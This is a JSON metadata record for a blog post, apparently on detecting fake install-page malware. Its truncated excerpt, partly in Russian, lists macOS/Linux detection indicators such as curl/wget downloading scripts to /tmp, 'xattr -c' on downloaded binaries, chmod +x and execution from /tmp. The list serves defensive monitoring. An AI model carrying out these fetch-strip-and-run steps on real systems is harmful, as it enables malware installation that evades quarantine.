hosts\u041e\u0441\u043e\u0431\u0435\u043d\u043d\u043e \u0435\u0441\u043b\u0438 \u044d\u0442\u043e \u043f\u0440\u043e\u0438\u0441\u0445\u043e\u0434\u0438\u0442 \u0441\u0440\u0430\u0437\u0443 \u043f\u043e\u0441\u043b\u0435 \u043f\u043e\u0441\u0435\u0449\u0435\u043d\u0438\u044f install page.\u0414\u043b\u044f macOS\/Linux:shell spawned from browser-adjacent activitycurl\/wget downloading executable\/script to \/tmpxattr -c on downloaded binarychmod +x on fresh downloadexecution from \/tmpunexpected&#8230;<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[],"tags":[],"class_list":["post-478926","post","type-post","status-publish","format-standard","hentry"],"_links":{"self":[{"href":"https:\/\/savepearlharbor.com\/index.php?rest_route=\/wp\/v2\/posts\/478926","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/savepearlharbor.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/savepearlharbor.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/savepearlharbor.com\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/savepearlharbor.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=478926"}],"version-history":[{"count":0,"href":"https:\/\/savepearlharbor.com\/index.php?rest_route=\/wp\/v2\/posts\/478926\/revisions"}],"wp:attachment":[{"href":"https:\/\/savepearlharbor.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=478926"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/savepearlharbor.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=478926"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/savepearlharbor.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=478926"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}